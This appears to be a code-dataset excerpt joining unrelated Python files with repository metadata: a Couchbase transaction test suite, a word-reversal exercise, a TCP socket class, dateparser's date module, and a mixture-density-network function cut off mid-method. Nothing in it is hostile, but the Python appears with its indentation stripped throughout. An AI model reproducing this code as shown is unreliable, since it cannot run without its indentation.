4223787a1f4c0fe9fa841543020b48ada9ade9e3
|
[
"Apache-2.0"
] | null | null | null |
pytests/Atomicity/basic_ops.py
|
ashwin2002/TAF
|
4223787a1f4c0fe9fa841543020b48ada9ade9e3
|
[
"Apache-2.0"
] | null | null | null |
from Cb_constants import DocLoading
from basetestcase import ClusterSetup
from couchbase_helper.documentgenerator import DocumentGenerator, doc_generator
from couchbase_helper.tuq_generators import JsonGenerator
from remote.remote_util import RemoteMachineShellConnection
from sdk_client3 import SDKClient
from com.couchbase.client.java.json import JsonObject
"""
Basic test cases with commit,rollback scenarios
"""
class basic_ops(ClusterSetup):
def setUp(self):
super(basic_ops, self).setUp()
if self.num_buckets:
self.bucket_util.create_multiple_buckets(
self.cluster.master,
self.num_replicas,
bucket_count=self.num_buckets,
bucket_type=self.bucket_type,
ram_quota=self.bucket_size,
storage=self.bucket_storage,
eviction_policy=self.bucket_eviction_policy)
else:
self.create_bucket()
self.sleep(10, "Wait for bucket to become ready for ops")
# Reset active_resident_threshold to avoid further data load as DGM
self.active_resident_threshold = 0
self.log.info("==========Finished Basic_ops base setup========")
def tearDown(self):
super(basic_ops, self).tearDown()
def get_doc_generator(self, start, end):
age = range(5)
first = ['james', 'sharon']
body = [''.rjust(self.doc_size - 10, 'a')]
template = JsonObject.create()
template.put("age", None)
template.put("first_name", None)
template.put("body", None)
generator = DocumentGenerator(self.key, template, randomize=True,
age=age,
first_name=first, body=body,
start=start, end=end,
key_size=self.key_size,
doc_size=self.doc_size,
doc_type=self.doc_type)
return generator
@staticmethod
def generate_docs_bigdata(docs_per_day, start=0, document_size=1024000):
json_generator = JsonGenerator()
return json_generator.generate_docs_bigdata(end=docs_per_day,
start=start,
value_size=document_size)
def test_basic_commit(self):
"""
Test transaction commit, rollback, time ahead,
time behind scenarios with replica, persist_to and
replicate_to settings
"""
# Atomicity.basic_ops.basic_ops.test_basic_commit
self.drift_ahead = self.input.param("drift_ahead", False)
self.drift_behind = self.input.param("drift_behind", False)
gen_create = self.get_doc_generator(0, self.num_items)
self.op_type = self.input.param("op_type", 'create')
if self.drift_ahead:
shell = RemoteMachineShellConnection(self.servers[0])
self.assertTrue(shell.change_system_time(3600),
'Failed to advance the clock')
output, _ = shell.execute_command('date')
self.log.info('Date after is set forward {0}'.format(output))
if self.drift_behind:
shell = RemoteMachineShellConnection(self.servers[0])
self.assertTrue(shell.change_system_time(-3600),
'Failed to advance the clock')
output, _ = shell.execute_command('date')
self.log.info('Date after is set behind {0}'.format(output))
self.log.info("Loading docs using AtomicityTask")
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
gen_create, self.op_type, exp=0,
batch_size=10,
process_concurrency=self.process_concurrency,
replicate_to=self.replicate_to,
persist_to=self.persist_to, timeout_secs=self.sdk_timeout,
retries=self.sdk_retries, update_count=self.update_count,
transaction_timeout=self.transaction_timeout,
commit=self.transaction_commit, durability=self.durability_level,
sync=self.sync, defer=self.defer)
self.log.info("going to execute the task")
self.task.jython_task_manager.get_task_result(task)
if self.op_type == "time_out":
self.sleep(90, "Wait for staged docs to get cleared")
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
gen_create, "create", exp=0,
batch_size=10,
process_concurrency=self.process_concurrency,
replicate_to=self.replicate_to,
persist_to=self.persist_to, timeout_secs=self.sdk_timeout,
retries=self.sdk_retries, update_count=self.update_count,
transaction_timeout=200,
commit=self.transaction_commit,
durability=self.durability_level,
sync=self.sync, defer=self.defer)
self.task_manager.get_task_result(task)
def test_large_doc_size_commit(self):
gen_create = self.generate_docs_bigdata(docs_per_day=self.num_items,
document_size=self.doc_size)
self.log.info("going to create a task")
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
gen_create, "create", exp=0,
batch_size=10,
process_concurrency=self.process_concurrency,
replicate_to=self.replicate_to,
persist_to=self.persist_to, timeout_secs=self.sdk_timeout,
retries=self.sdk_retries,
transaction_timeout=self.transaction_timeout,
commit=self.transaction_commit, durability=self.durability_level,
sync=self.sync, defer=self.defer)
self.log.info("going to execute the task")
self.task.jython_task_manager.get_task_result(task)
def test_MB_41944(self):
num_index = self.input.param("num_index", 1)
# Create doc_gen for loading
doc_gen = doc_generator(self.key, 0, 1)
# Get key for delete op and reset the gen
key, v = doc_gen.next()
doc_gen.reset()
# Open SDK client connection
client = SDKClient([self.cluster.master], self.bucket_util.buckets[0])
query = list()
query.append("CREATE PRIMARY INDEX index_0 on %s USING GSI"
% self.bucket_util.buckets[0].name)
if num_index == 2:
query.append("CREATE INDEX index_1 on %s(name,age) "
"WHERE mutated=0 USING GSI"
% self.bucket_util.buckets[0].name)
# Create primary index on the bucket
for q in query:
client.cluster.query(q)
# Wait for index to become online`
for index, _ in enumerate(query):
query = "SELECT state FROM system:indexes WHERE name='index_%s'" \
% index
index = 0
state = None
while index < 30:
state = client.cluster.query(query) \
.rowsAsObject()[0].get("state")
if state == "online":
break
self.sleep(1)
if state != "online":
self.log_failure("Index 'index_%s' not yet online" % index)
# Start transaction to create the doc
trans_task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
doc_gen, DocLoading.Bucket.DocOps.CREATE)
self.task_manager.get_task_result(trans_task)
# Perform sub_doc operation on same key
_, fail = client.crud(DocLoading.Bucket.SubDocOps.INSERT,
key=key, value=["_sysxattr", "sysxattr-payload"],
xattr=True)
if fail:
self.log_failure("Subdoc insert failed: %s" % fail)
else:
self.log.info("Subdoc insert success")
# Delete the created doc
result = client.crud(DocLoading.Bucket.DocOps.DELETE, key)
if result["status"] is False:
self.log_failure("Doc delete failed: %s" % result["error"])
else:
self.log.info("Document deleted")
# Re-insert same doc through transaction
trans_task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
doc_gen, DocLoading.Bucket.DocOps.CREATE)
self.task_manager.get_task_result(trans_task)
# Close SDK Client connection
client.close()
self.validate_test_failure()
| 42.138095
| 79
| 0.600181
| 1,019
| 8,849
| 4.996075
| 0.223749
| 0.025535
| 0.02475
| 0.032999
| 0.413082
| 0.396975
| 0.385582
| 0.385582
| 0.363976
| 0.363976
| 0
| 0.010176
| 0.311448
| 8,849
| 209
| 80
| 42.339713
| 0.825373
| 0.063284
| 0
| 0.322981
| 0
| 0
| 0.093364
| 0
| 0
| 0
| 0
| 0
| 0.012422
| 1
| 0.043478
| false
| 0
| 0.043478
| 0
| 0.10559
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1346bfc37ba0726e8df79447049dc235a411088d
| 509
|
py
|
Python
|
reverseWord.py
|
lovefov/Python
|
ba8fc49e6e503927dc1f827f37b77f3e43b5d0c8
|
[
"MIT"
] | null | null | null |
reverseWord.py
|
lovefov/Python
|
ba8fc49e6e503927dc1f827f37b77f3e43b5d0c8
|
[
"MIT"
] | null | null | null |
reverseWord.py
|
lovefov/Python
|
ba8fc49e6e503927dc1f827f37b77f3e43b5d0c8
|
[
"MIT"
] | 1
|
2021-02-08T08:48:44.000Z
|
2021-02-08T08:48:44.000Z
|
#!/usr/bin/env python3
#-*- coding:utf-8 -*-
#Author:贾江超
def spin_words(sentence):
list1=sentence.split()
l=len(list1)
for i in range(l):
relen = len(sentence.split()[i:][0])
if relen > 5:
list1[i]=list1[i][::-1]
return ' '.join(list1)
'''
注意 在2.x版本可以用len()得到list的长度 3.x版本就不行了
优化版本
def spin_words(sentence):
# Your code goes here
return " ".join([x[::-1] if len(x) >= 5 else x for x in sentence.split(" ")])
在这里倒序字符串用切片很方便 str[::-1] 就ok了
'''
| 19.576923
| 81
| 0.569745
| 75
| 509
| 3.84
| 0.586667
| 0.135417
| 0.083333
| 0.138889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.03876
| 0.239686
| 509
| 25
| 82
| 20.36
| 0.705426
| 0.100196
| 0
| 0
| 0
| 0
| 0.004386
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1346de71efda2a56a9fe39787dfce52620463eb1
| 3,461
|
py
|
Python
|
src/scs_host/comms/network_socket.py
|
south-coast-science/scs_host_cpc
|
08b4a28c022936462b60823cca136ba6746eac57
|
[
"MIT"
] | null | null | null |
src/scs_host/comms/network_socket.py
|
south-coast-science/scs_host_cpc
|
08b4a28c022936462b60823cca136ba6746eac57
|
[
"MIT"
] | null | null | null |
src/scs_host/comms/network_socket.py
|
south-coast-science/scs_host_cpc
|
08b4a28c022936462b60823cca136ba6746eac57
|
[
"MIT"
] | null | null | null |
"""
Created on 30 May 2017
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
A network socket abstraction, implementing ProcessComms
"""
import socket
import time
from scs_core.sys.process_comms import ProcessComms
# --------------------------------------------------------------------------------------------------------------------
class NetworkSocket(ProcessComms):
"""
classdocs
"""
__TIMEOUT = 4.0 # seconds
__BUFFER_SIZE = 1024 # bytes
__BACKLOG = 5
__ACK = "ACK"
# ----------------------------------------------------------------------------------------------------------------
def __init__(self, host, port=2000): # a receiving socket should have host ''
"""
Constructor
"""
self.__address = (host, port)
self.__socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
self.__conn = None
# ----------------------------------------------------------------------------------------------------------------
def connect(self, wait_for_availability=True):
while True:
try:
self.__socket.connect(self.__address)
break
except ConnectionRefusedError as ex:
if not wait_for_availability:
raise ConnectionRefusedError(ex)
time.sleep(0.1)
def close(self):
try:
if self.__conn:
self.__conn.close()
except RuntimeError:
pass
try:
self.__socket.close()
except RuntimeError:
pass
# ----------------------------------------------------------------------------------------------------------------
def read(self):
# socket...
self.__socket.bind(self.__address)
self.__socket.listen(NetworkSocket.__BACKLOG)
self.__conn, _ = self.__socket.accept()
# data...
while True:
message = self.__conn.recv(NetworkSocket.__BUFFER_SIZE).decode().strip()
if len(message) == 0:
break
yield message
def write(self, message, wait_for_availability=True):
while True:
try:
# data...
self.__socket.send(message.encode())
# wait for ACK...
timeout = time.time() + NetworkSocket.__TIMEOUT
while self.__socket.recv(NetworkSocket.__BUFFER_SIZE).decode() != NetworkSocket.__ACK:
time.sleep(0.001)
if time.time() > timeout:
break
break
except ConnectionError:
if not wait_for_availability:
raise
self.close()
time.sleep(0.1)
self.__socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
self.connect()
# ----------------------------------------------------------------------------------------------------------------
def ack(self):
self.__conn.send(str(NetworkSocket.__ACK).encode())
# ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
return "NetworkSocket:{address:%s, socket:%s}" % (self.__address, self.__socket)
| 27.251969
| 118
| 0.428489
| 266
| 3,461
| 5.25188
| 0.368421
| 0.07874
| 0.054402
| 0.031496
| 0.230494
| 0.18325
| 0.141732
| 0.091625
| 0.091625
| 0.091625
| 0
| 0.010731
| 0.299913
| 3,461
| 126
| 119
| 27.468254
| 0.565827
| 0.271309
| 0
| 0.344262
| 0
| 0
| 0.016234
| 0.010552
| 0
| 0
| 0
| 0
| 0
| 1
| 0.114754
| false
| 0.032787
| 0.04918
| 0.016393
| 0.262295
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13470b2018f5f54dbcfea9b085e57cd30b1be672
| 15,182
|
py
|
Python
|
dateparser/date.py
|
JKhakpour/dateparser
|
7f324cfd3de04e91752979cf65ae0dedc622375f
|
[
"BSD-3-Clause"
] | 2
|
2019-03-12T10:50:15.000Z
|
2021-07-07T14:38:58.000Z
|
dateparser/date.py
|
JKhakpour/dateparser
|
7f324cfd3de04e91752979cf65ae0dedc622375f
|
[
"BSD-3-Clause"
] | null | null | null |
dateparser/date.py
|
JKhakpour/dateparser
|
7f324cfd3de04e91752979cf65ae0dedc622375f
|
[
"BSD-3-Clause"
] | 1
|
2018-03-07T13:25:16.000Z
|
2018-03-07T13:25:16.000Z
|
# -*- coding: utf-8 -*-
import calendar
import collections
from datetime import datetime, timedelta
from warnings import warn
import six
import regex as re
from dateutil.relativedelta import relativedelta
from dateparser.date_parser import date_parser
from dateparser.freshness_date_parser import freshness_date_parser
from dateparser.languages.loader import LanguageDataLoader
from dateparser.languages.detection import AutoDetectLanguage, ExactLanguages
from dateparser.conf import apply_settings
from dateparser.utils import normalize_unicode, apply_timezone_from_settings
APOSTROPHE_LOOK_ALIKE_CHARS = [
u'\N{RIGHT SINGLE QUOTATION MARK}', # u'\u2019'
u'\N{MODIFIER LETTER APOSTROPHE}', # u'\u02bc'
u'\N{MODIFIER LETTER TURNED COMMA}', # u'\u02bb'
u'\N{ARMENIAN APOSTROPHE}', # u'\u055a'
u'\N{LATIN SMALL LETTER SALTILLO}', # u'\ua78c'
u'\N{PRIME}', # u'\u2032'
u'\N{REVERSED PRIME}', # u'\u2035'
u'\N{MODIFIER LETTER PRIME}', # u'\u02b9'
u'\N{FULLWIDTH APOSTROPHE}', # u'\uff07'
]
RE_NBSP = re.compile(u'\xa0', flags=re.UNICODE)
RE_SPACES = re.compile(r'\s+')
RE_TRIM_SPACES = re.compile(r'^\s+(\S.*?)\s+$')
RE_SANITIZE_SKIP = re.compile(r'\t|\n|\r|\u00bb|,\s\u0432|\u200e|\xb7|\u200f|\u064e|\u064f', flags=re.M)
RE_SANITIZE_RUSSIAN = re.compile(r'([\W\d])\u0433\.', flags=re.I | re.U)
RE_SANITIZE_AMPM = re.compile(r'\b([ap])(\.)?m(\.)?\b', flags=re.DOTALL | re.I)
RE_SANITIZE_ON = re.compile(r'^.*?on:\s+(.*)')
RE_SANITIZE_APOSTROPHE = re.compile(u'|'.join(APOSTROPHE_LOOK_ALIKE_CHARS))
RE_SEARCH_TIMESTAMP = re.compile(r'^\d{10}(?![^\d.])')
def sanitize_spaces(html_string):
html_string = RE_NBSP.sub(' ', html_string)
html_string = RE_SPACES.sub(' ', html_string)
html_string = RE_TRIM_SPACES.sub(r'\1', html_string)
return html_string
def date_range(begin, end, **kwargs):
dateutil_error_prone_args = ['year', 'month', 'week', 'day', 'hour',
'minute', 'second']
for arg in dateutil_error_prone_args:
if arg in kwargs:
raise ValueError("Invalid argument: %s" % arg)
step = relativedelta(**kwargs) if kwargs else relativedelta(days=1)
date = begin
while date < end:
yield date
date += step
# handles edge-case when iterating months and last interval is < 30 days
if kwargs.get('months', 0) > 0 and (date.year, date.month) == (end.year, end.month):
yield end
def get_intersecting_periods(low, high, period='day'):
if period not in ['year', 'month', 'week', 'day', 'hour', 'minute', 'second', 'microsecond']:
raise ValueError("Invalid period: {}".format(period))
if high <= low:
return
step = relativedelta(**{period + 's': 1})
current_period_start = low
if isinstance(current_period_start, datetime):
reset_arguments = {}
for test_period in ['microsecond', 'second', 'minute', 'hour']:
if test_period == period:
break
else:
reset_arguments[test_period] = 0
current_period_start = current_period_start.replace(**reset_arguments)
if period == 'week':
current_period_start \
= current_period_start - timedelta(days=current_period_start.weekday())
elif period == 'month':
current_period_start = current_period_start.replace(day=1)
elif period == 'year':
current_period_start = current_period_start.replace(month=1, day=1)
while current_period_start < high:
yield current_period_start
current_period_start += step
def sanitize_date(date_string):
date_string = RE_SANITIZE_SKIP.sub(' ', date_string)
date_string = RE_SANITIZE_RUSSIAN.sub(r'\1 ', date_string) # remove u'г.' (Russian for year) but not in words
date_string = sanitize_spaces(date_string)
date_string = RE_SANITIZE_AMPM.sub(r'\1m', date_string)
date_string = RE_SANITIZE_ON.sub(r'\1', date_string)
date_string = RE_SANITIZE_APOSTROPHE.sub(u"'", date_string)
return date_string
def get_date_from_timestamp(date_string, settings):
if RE_SEARCH_TIMESTAMP.search(date_string):
date_obj = datetime.fromtimestamp(int(date_string[:10]))
date_obj = apply_timezone_from_settings(date_obj, settings)
return date_obj
def get_last_day_of_month(year, month):
return calendar.monthrange(year, month)[1]
def parse_with_formats(date_string, date_formats, settings):
""" Parse with formats and return a dictionary with 'period' and 'obj_date'.
:returns: :class:`datetime.datetime`, dict or None
"""
period = 'day'
for date_format in date_formats:
try:
date_obj = datetime.strptime(date_string, date_format)
except ValueError:
continue
else:
# If format does not include the day, use last day of the month
# instead of first, because the first is usually out of range.
if '%d' not in date_format:
period = 'month'
date_obj = date_obj.replace(
day=get_last_day_of_month(date_obj.year, date_obj.month))
if not ('%y' in date_format or '%Y' in date_format):
today = datetime.today()
date_obj = date_obj.replace(year=today.year)
date_obj = apply_timezone_from_settings(date_obj, settings)
return {'date_obj': date_obj, 'period': period}
else:
return {'date_obj': None, 'period': period}
class _DateLanguageParser(object):
DATE_FORMATS_ERROR_MESSAGE = "Date formats should be list, tuple or set of strings"
def __init__(self, language, date_string, date_formats, settings=None):
self._settings = settings
if isinstance(date_formats, six.string_types):
warn(self.DATE_FORMATS_ERROR_MESSAGE, FutureWarning)
date_formats = [date_formats]
elif not (date_formats is None or isinstance(date_formats, (list, tuple, collections.Set))):
raise TypeError(self.DATE_FORMATS_ERROR_MESSAGE)
self.language = language
self.date_string = date_string
self.date_formats = date_formats
self._translated_date = None
self._translated_date_with_formatting = None
@classmethod
def parse(cls, language, date_string, date_formats=None, settings=None):
instance = cls(language, date_string, date_formats, settings)
return instance._parse()
def _parse(self):
for parser in (
self._try_timestamp,
self._try_freshness_parser,
self._try_given_formats,
self._try_parser,
self._try_hardcoded_formats,
):
date_obj = parser()
if self._is_valid_date_obj(date_obj):
return date_obj
else:
return None
def _try_timestamp(self):
return {
'date_obj': get_date_from_timestamp(self.date_string, self._settings),
'period': 'day',
}
def _try_freshness_parser(self):
return freshness_date_parser.get_date_data(self._get_translated_date(), self._settings)
def _try_parser(self):
_order = self._settings.DATE_ORDER
try:
if self._settings.PREFER_LANGUAGE_DATE_ORDER:
self._settings.DATE_ORDER = self.language.info.get('dateorder', _order)
date_obj, period = date_parser.parse(
self._get_translated_date(), settings=self._settings)
self._settings.DATE_ORDER = _order
return {
'date_obj': date_obj,
'period': period,
}
except ValueError:
self._settings.DATE_ORDER = _order
return None
def _try_given_formats(self):
if not self.date_formats:
return
return parse_with_formats(
self._get_translated_date_with_formatting(),
self.date_formats, settings=self._settings
)
def _try_hardcoded_formats(self):
hardcoded_date_formats = [
'%B %d, %Y, %I:%M:%S %p',
'%b %d, %Y at %I:%M %p',
'%d %B %Y %H:%M:%S',
'%A, %B %d, %Y',
'%Y-%m-%dT%H:%M:%S.%fZ'
]
try:
return parse_with_formats(
self._get_translated_date_with_formatting(),
hardcoded_date_formats,
settings=self._settings
)
except TypeError:
return None
def _get_translated_date(self):
if self._translated_date is None:
self._translated_date = self.language.translate(
self.date_string, keep_formatting=False, settings=self._settings)
return self._translated_date
def _get_translated_date_with_formatting(self):
if self._translated_date_with_formatting is None:
self._translated_date_with_formatting = self.language.translate(
self.date_string, keep_formatting=True, settings=self._settings)
return self._translated_date_with_formatting
def _is_valid_date_obj(self, date_obj):
if not isinstance(date_obj, dict):
return False
if len(date_obj) != 2:
return False
if 'date_obj' not in date_obj or 'period' not in date_obj:
return False
if not date_obj['date_obj']:
return False
if date_obj['period'] not in ('day', 'week', 'month', 'year'):
return False
return True
class DateDataParser(object):
"""
Class which handles language detection, translation and subsequent generic parsing of
string representing date and/or time.
:param languages:
A list of two letters language codes, e.g. ['en', 'es'].
If languages are given, it will not attempt to detect the language.
:type languages: list
:param allow_redetect_language:
Enables/disables language re-detection.
:type allow_redetect_language: bool
:param settings:
Configure customized behavior using settings defined in :mod:`dateparser.conf.Settings`.
:type settings: dict
:return: A parser instance
:raises:
ValueError - Unknown Language, TypeError - Languages argument must be a list
"""
language_loader = None
@apply_settings
def __init__(self, languages=None, allow_redetect_language=False, settings=None):
self._settings = settings
available_language_map = self._get_language_loader().get_language_map()
if isinstance(languages, (list, tuple, collections.Set)):
if all([language in available_language_map for language in languages]):
languages = [available_language_map[language] for language in languages]
else:
unsupported_languages = set(languages) - set(available_language_map.keys())
raise ValueError(
"Unknown language(s): %s" % ', '.join(map(repr, unsupported_languages)))
elif languages is not None:
raise TypeError("languages argument must be a list (%r given)" % type(languages))
if allow_redetect_language:
self.language_detector = AutoDetectLanguage(
languages if languages else list(available_language_map.values()),
allow_redetection=True)
elif languages:
self.language_detector = ExactLanguages(languages=languages)
else:
self.language_detector = AutoDetectLanguage(
list(available_language_map.values()), allow_redetection=False)
def get_date_data(self, date_string, date_formats=None):
"""
Parse string representing date and/or time in recognizable localized formats.
Supports parsing multiple languages and timezones.
:param date_string:
A string representing date and/or time in a recognizably valid format.
:type date_string: str|unicode
:param date_formats:
A list of format strings using directives as given
`here <https://docs.python.org/2/library/datetime.html#strftime-and-strptime-behavior>`_.
The parser applies formats one by one, taking into account the detected languages.
:type date_formats: list
:return: a dict mapping keys to :mod:`datetime.datetime` object and *period*. For example:
{'date_obj': datetime.datetime(2015, 6, 1, 0, 0), 'period': u'day'}
:raises: ValueError - Unknown Language
.. note:: *Period* values can be a 'day' (default), 'week', 'month', 'year'.
*Period* represents the granularity of date parsed from the given string.
In the example below, since no day information is present, the day is assumed to be current
day ``16`` from *current date* (which is June 16, 2015, at the moment of writing this).
Hence, the level of precision is ``month``:
>>> DateDataParser().get_date_data(u'March 2015')
{'date_obj': datetime.datetime(2015, 3, 16, 0, 0), 'period': u'month'}
Similarly, for date strings with no day and month information present, level of precision
is ``year`` and day ``16`` and month ``6`` are from *current_date*.
>>> DateDataParser().get_date_data(u'2014')
{'date_obj': datetime.datetime(2014, 6, 16, 0, 0), 'period': u'year'}
Dates with time zone indications or UTC offsets are returned in UTC time unless
specified using `Settings`_.
>>> DateDataParser().get_date_data(u'23 March 2000, 1:21 PM CET')
{'date_obj': datetime.datetime(2000, 3, 23, 14, 21), 'period': 'day'}
"""
if not(isinstance(date_string, six.text_type) or isinstance(date_string, six.string_types)):
raise TypeError('Input type must be str or unicode')
res = parse_with_formats(date_string, date_formats or [], self._settings)
if res['date_obj']:
return res
if self._settings.NORMALIZE:
date_string = normalize_unicode(date_string)
date_string = sanitize_date(date_string)
for language in self.language_detector.iterate_applicable_languages(
date_string, modify=True, settings=self._settings):
parsed_date = _DateLanguageParser.parse(
language, date_string, date_formats, settings=self._settings)
if parsed_date:
parsed_date['language'] = language.shortname
return parsed_date
else:
return {'date_obj': None, 'period': 'day', 'language': None}
def get_date_tuple(self, *args, **kwargs):
date_tuple = collections.namedtuple('DateData', 'date_obj period language')
date_data = self.get_date_data(*args, **kwargs)
return date_tuple(**date_data)
@classmethod
def _get_language_loader(cls):
if not cls.language_loader:
cls.language_loader = LanguageDataLoader()
return cls.language_loader
| 38.338384
| 114
| 0.640364
| 1,876
| 15,182
| 4.943497
| 0.188699
| 0.030947
| 0.024154
| 0.015096
| 0.26019
| 0.177054
| 0.104593
| 0.035799
| 0.025232
| 0.025232
| 0
| 0.012166
| 0.258266
| 15,182
| 395
| 115
| 38.435443
| 0.811384
| 0.194177
| 0
| 0.15444
| 0
| 0.003861
| 0.083747
| 0.008408
| 0
| 0
| 0
| 0
| 0
| 1
| 0.084942
| false
| 0
| 0.050193
| 0.011583
| 0.266409
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1347a75f9a9bad0cfccf1c5a976700bd26f857d2
| 8,817
|
py
|
Python
|
src/models/functions/connection/mixture_density_network.py
|
kristofbc/handwriting-synthesis
|
16505e89fd7275d4cd3ed9c4388c9f3c153a0397
|
[
"FTL"
] | null | null | null |
src/models/functions/connection/mixture_density_network.py
|
kristofbc/handwriting-synthesis
|
16505e89fd7275d4cd3ed9c4388c9f3c153a0397
|
[
"FTL"
] | null | null | null |
src/models/functions/connection/mixture_density_network.py
|
kristofbc/handwriting-synthesis
|
16505e89fd7275d4cd3ed9c4388c9f3c153a0397
|
[
"FTL"
] | null | null | null |
import chainer
import chainer.functions
from chainer.utils import type_check
from chainer import cuda
from chainer import function
import numpy as np
#from chainer import function_node
from utils import clip_grad
#class MixtureDensityNetworkFunction(function_node.FunctionNode):
class MixtureDensityNetworkFunction(function.Function):
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 8)
x_type, eos_input_type, pi_input_type, mu_x1_input_type, mu_x2_input_type, s_x1_input_type, s_x2_input_type, rho_input_type = in_types
type_check.expect(
x_type.dtype.kind == 'f',
eos_input_type.dtype.kind == 'f',
pi_input_type.dtype.kind == 'f',
mu_x1_input_type.dtype.kind == 'f',
mu_x2_input_type.dtype.kind == 'f',
s_x1_input_type.dtype.kind == 'f',
s_x2_input_type.dtype.kind == 'f',
rho_input_type.dtype.kind == 'f',
x_type.ndim >= 2,
eos_input_type.ndim >= 2,
x_type.shape[0] == eos_input_type.shape[0],
x_type.shape[0] == pi_input_type.shape[0],
x_type.shape[0] == mu_x1_input_type.shape[0],
x_type.shape[0] == mu_x2_input_type.shape[0],
x_type.shape[0] == s_x1_input_type.shape[0],
x_type.shape[0] == s_x2_input_type.shape[0],
x_type.shape[0] == rho_input_type.shape[0],
pi_input_type.shape[1] == mu_x1_input_type.shape[1],
mu_x1_input_type.shape[1] == mu_x2_input_type.shape[1],
mu_x2_input_type.shape[1] == s_x1_input_type.shape[1],
s_x1_input_type.shape[1] == s_x2_input_type.shape[1],
s_x2_input_type.shape[1] == rho_input_type.shape[1]
)
pass
def forward(self, inputs):
x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = inputs
#self.retain_inputs(range(len(inputs))) # Retain everything for backward
if not type_check.same_types(*inputs):
raise ValueError("numpy and cupy must not be used together\n"
"type(x): {0}, type(eos_input): {1}, type(pi_input): {2}"
"type(mu_x1_input): {3}, type(mu_x2_input): {4}, type(s_x1_input): {5}"
"type(s_x2_input): {6}, type(rho_input): {7}"
.format(type(x), type(eos_input), type(pi_input),
type(mu_x1_input), type(mu_x2_input), type(s_x1_input),
type(s_x2_input), type(rho_input)))
xp = cuda.get_array_module(*inputs)
def softmax(x):
shiftx = x - x.max()
exps = xp.exp(shiftx)
return exps / xp.sum(exps, 1, keepdims=True)
# Get MDN coeff. Eq #18 to #22
z_eos = 1. / (1. + xp.exp(eos_input)) # F.sigmoid. NOTE: usually sigmoid is 1/(1+e^-x). Here 'x' is >0!
z_s_x1 = xp.exp(s_x1_input) + 1e-10
z_s_x2 = xp.exp(s_x2_input) + 1e-10
z_rho = xp.tanh(rho_input)
z_pi = softmax(pi_input)
#z_pi = xp.exp(pi_input)
#z_pi = z_pi / xp.sum(z_pi, 1, keepdims=True)
z_mu_x1 = mu_x1_input
z_mu_x2 = mu_x2_input
# The MDN coeff are saved, because they're reused in the backward phase
self.z_eos = z_eos
self.z_s_x1 = z_s_x1
self.z_s_x2 = z_s_x2
self.z_rho = z_rho
self.z_pi = z_pi
self.z_mu_x1 = z_mu_x1
self.z_mu_x2 = z_mu_x2
# Compute the loss.
x1 = x[:, 0:1]
x2 = x[:, 1:2]
x3 = x[:, 2:3]
# Z variable. Eq. 25
norm_x1 = x1 - z_mu_x1
norm_x2 = x2 - z_mu_x2
z_left = (xp.square(norm_x1)/xp.square(z_s_x1)) + (xp.square(norm_x2)/xp.square(z_s_x2))
z_right = (2.*z_rho*norm_x1*norm_x2)/(z_s_x1*z_s_x2)
z = z_left - z_right
self.z = z
# Normal function. Eq. 24.
inv_ro = 1. - xp.square(z_rho) + 1e-10
n_left = 2. * np.pi * z_s_x1 * z_s_x2 * xp.sqrt(inv_ro) + 1e-10 # + 1e-10 for computational stability
n_right = xp.exp(-z / (2. * inv_ro))
n = n_right / n_left
# Gamma parameter (for the backward phase). Eq. 28-29
gamma = z_pi * n
gamma = gamma / (xp.sum(gamma, 1, keepdims=True) + 1e-10) # sum + 1e-10 for computational stability, != nan!
self.gamma = gamma
# Sequence loss. Eq. 26
loss_y = z_pi * n
loss_y = xp.sum(loss_y, 1, keepdims=True) + 1e-10 # + 1e-10 for computational stability, != nan
#epsilon = xp.full(loss_y.shape, 1e-10, dtype=xp.float32)
#loss_y = xp.maximum(loss_y, epsilon) # Because at the begining loss_y is exactly 0 sometime
loss_y = -xp.log(loss_y + 1e-10)
#loss_x = z_eos * x3 + (1. - z_eos) * (1. - x3)
#loss_x = -xp.log(loss_x)
loss_x = -x3 * xp.log(z_eos + 1e-10) - (1. - x3) * xp.log(1. - z_eos + 1e-10)
loss = loss_y + loss_x
# Mask guard to check if x3 == 2 (added padding)
idx_mask = xp.where(x3==2)[0]
mask = xp.ones_like(x3)
mask[idx_mask, 0] = 0.
self.mask = mask
loss *= mask
return loss, x, z_eos, z_pi, z_mu_x1, z_mu_x2, z_s_x1, z_s_x2, z_rho,
def backward(self, inputs, grad_outputs):
xp = cuda.get_array_module(*inputs)
